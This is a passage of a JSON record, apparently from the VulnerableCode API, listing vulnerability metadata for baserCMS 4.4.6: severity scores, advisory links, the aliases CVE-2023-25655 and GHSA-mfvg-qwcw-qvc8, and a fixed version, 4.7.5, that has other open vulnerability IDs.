"value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/64369?format=api", "purl": "pkg:composer/baserproject/basercms@4.7.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3new-f12y-8bf9" }, { "vulnerability": "VCID-4zw8-truk-pugf" }, { "vulnerability": "VCID-7x3n-4c2b-nfbx" }, { "vulnerability": "VCID-8buz-nsr9-3yge" }, { "vulnerability": "VCID-8ssu-umet-37bk" }, { "vulnerability": "VCID-d1sf-cmct-zbh1" }, { "vulnerability": "VCID-g56w-z9cx-5ygv" }, { "vulnerability": "VCID-ggv8-3v9t-mfea" }, { "vulnerability": "VCID-jby7-s5ez-dqb3" }, { "vulnerability": "VCID-k5qv-4yp3-zbgf" }, { "vulnerability": "VCID-khft-xvrw-g3dr" }, { "vulnerability": "VCID-mfm9-gsh3-ubg8" }, { "vulnerability": "VCID-nxrf-64er-xbfx" }, { "vulnerability": "VCID-p695-t9ye-v3ga" }, { "vulnerability": "VCID-pd8c-9d7z-zkhg" }, { "vulnerability": "VCID-sqr4-v889-tff8" }, { "vulnerability": "VCID-u16w-rbuk-ybfs" }, { "vulnerability": "VCID-uedz-j2vn-cbea" }, { "vulnerability": "VCID-y2sz-c6vb-pkdp" }, { "vulnerability": "VCID-zqd4-rdem-jfgk" }, { "vulnerability": "VCID-zxns-tzw3-27fr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5" } ], "aliases": [ "CVE-2023-25655", "GHSA-mfvg-qwcw-qvc8" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6" } ], "fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.6" }